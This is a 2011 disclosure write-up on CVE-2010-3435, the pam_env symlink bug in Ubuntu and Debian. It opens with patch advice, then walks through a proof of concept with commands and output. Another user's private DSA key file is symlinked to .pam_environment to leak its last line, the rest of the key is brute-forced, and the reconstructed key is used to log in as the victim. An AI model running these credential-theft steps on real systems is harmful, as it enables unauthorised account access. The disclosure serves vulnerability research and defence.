Leveraging a symlink attack to steal DSA keys

简介: Author:Peter van Dijk peter@7bits.nlVersion:20110530-4IMPORTANTIf you are ...
Author: Peter van Dijk peter@7bits.nl
Version: 20110530-4


If you are on Ubuntu: please update libpam-modules now (see USN-1140-1). If you are on Debian: please implement the workaround of adding user_readenv=0 to every pam_env.so entry in /etc/pam.d.

If you are on RHEL/CentOS: don't worry -- they fixed this bug last year.


Previous versions of pam_env (as shipped with recent Ubuntu and Debian releases) have a bug where users can steal data from other users (including root) assuming it fits a 'VAR=value' format. This issue is known as CVE-2010-3435.

As it turns out, PEM (which is just base64 DER) formatted cryptography keys can end in a line that ends in ==, and pam_env tolerates this format. This means we can steal that line to see if it provides us with enough information to reconstruct a full private key.

I've done some research, and it turns out that over a sample of 1000 freshly generated DSA keys, around 20% of those (when encoded in DER/PEM form, as is common) end in ==. Some, we still can't read because their last line starts with a number; the pam_env issue requires an alphanumeric line (starting with a letter), ending in ==. In the end, about 10% of private DSA keys expose their last line to us this way.

Of those keys, 98% leak 16*8=128 bits of the private part (x) of a DSA key. The rest (within my sample of 1000) leak 13*8=104 bits. The private part appears to be around 160 bits long on average.

This report documents a staged attack. It should explain most of the issue.

I make the following assumptions.

  1. Eve can obtain the public key
  2. the private key is in the 10% that is vulnerable
  3. there is no passphrase on the private key (perhaps she's using them for rsync backups?)

Here follows an example 'conversation' between Alice and Eve. You can find all the scripts I wrote in this Mercurial repository.


Alice has her DSA keypair she uses to log in to various places. She's silly enough to not use a passphrase:

alice:~$ ssh-keygen -t dsa
Generating public/private dsa key pair.
Enter file in which to save the key (/home/alice/.ssh/id_dsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/alice/.ssh/id_dsa.
Your public key has been saved in /home/alice/.ssh/id_dsa.pub.
The key fingerprint is:
67:de:0c:71:72:f4:a8:13:59:22:a9:38:7a:b4:7d:6b alice@classroom
The key's randomart image is:
+--[ DSA 1024]----+
|        ... o    |
|        .. = o   |
|     . .  = + .  |
|    + .    B     |
|   o +  S *      |
|  . o . .+ =     |
|   .   . .. o    |
|        E        |
|       .         |

Not everybody does this next bit but it makes this demonstration a bit simpler.

alice:~$ cd .ssh
alice:~/.ssh$ cp id_dsa.pub authorized_keys

Some time later, Eve comes in with her user account on the same machine.


Eve employs the pam_env symlink trick:

eve:~$ ln -s /home/alice/.ssh/id_dsa .pam_environment
eve:~$ logout

Logs out, logs back in (newlines inserted for readability):

Last login: Sat May 14 02:18:02 2011 from
eve:~$ set | grep == | grep -v '^ '
eve:~$ cat /home/alice/.ssh/id_dsa.pub
ssh-dss AAAAB3NzaC1kc3MAAACBANVRS9oBaKKlLMkzNm3dc5yTW+zWTcI5yyXC
jQdNxPQHJGc= alice@classroom

Depending on some factors, .ssh permissions may not allow reading the pub file; we're assuming that in general the public key is available.

The bSsUBZkPeLhzmQZtCB97Xg== bit is most of DSA's private part, x. The public key provides all other variables. Let's get to work (newlines inserted in numbers for readability, sshpubkey truncated with ... for brevity):

eve:~$ ./parse.py AAAA...PQHJGc= bSsUBZkPeLhzmQZtCB97Xg== > data
eve:~$ cat data
p=(1032, 14979668739262847199401286465805946933553729526270785613
q=(168, 1145403468472839477189710491941815844340807462969L)
g=(1024, 8602842407060379245644785877262588638713334499529766182487
y=(1032, 1010388428517245355327173365948491524813492949714774563537
xtail=(128, 145109526397175623815740512749110655838L)

p, q, g and y are gathered from the pubkey. Each variable is stored as a (len, i) tuple; len indicates the number of bits actually stored -- this is mostly so we know how many leading zeroes we may have.

xtail is the tail part of x that we gathered from the last line of Alice's private key file.

Eve copies this data file to her render farm and sets it to work:

eve@cluster:~$ ./farm.py data 4 host1 host2 host3 host4 host5 host6

6 hours pass.

found 1114417266960240201277285122766916336093931469662

Yay! Let's use this information for good. Or for bad ;)

Reconstruct Alice's private key:

eve:~$ ./out.py data 1114417266960240201277285122766916336093931469662 |
   openssl dsa -inform der -outform pem > alice_reconstructed_key
read DSA key
writing DSA key
eve:~$ chmod 600 alice_reconstructed_key

Try logging in with it:

eve:~$ ssh -i alice_reconstructed_key alice@localhost
Last login: Sat May 14 08:17:53 2011 from ::1

Looks like Eve did it and Alice is in trouble.


A symlink attack in pam_env allows us to steal data if it's formatted in specific ways. About 10% of private DSA keys expose their last base64-encoded line this way. If we can obtain the public key that goes with such a key, we have about 32 bits of private key data to guess. This turns out to be entirely feasible on modern hardware. In this specific demonstration, 24 cores of a recent CPU model needed 6 hours to reconstruct the complete private key.

Assorted notes

CPU-power to do the reconstruction comes to about $30 at Amazon EC2 -- entirely feasible for even the cheapest of attackers.


I would like to gratefully acknowledge the following people who have contributed ideas and helped develop the proof of concept: Christiaan Ottow (Pine Digital Security), Job Snijders (Snijders IT), my coworker Pim van Riezen, my employer XLS Hosting, and the fine people of ##crypto on the freenode IRC network.

Also, the PARI computation library and its Python interface have been instrumental in making this happen.


Q: Is this a weakness in DSA? Should I switch to RSA?
A: I cannot provide advice on the relative merits of RSA versus DSA, but this article should not be considered a reason to drop DSA.
Q: What about RSA?
A: RSA private keys contain a bunch of 'secret' variables, where DSA only has one. Also, RSA variables are longer so this attack only lifts about 1/3rd of one of those variables. My impression is that this does not reduce attack time to be feasible. I did not verify this.


You can reach me at peter@7bits.nl for any questions or suggestions.

-- Peter van Dijk

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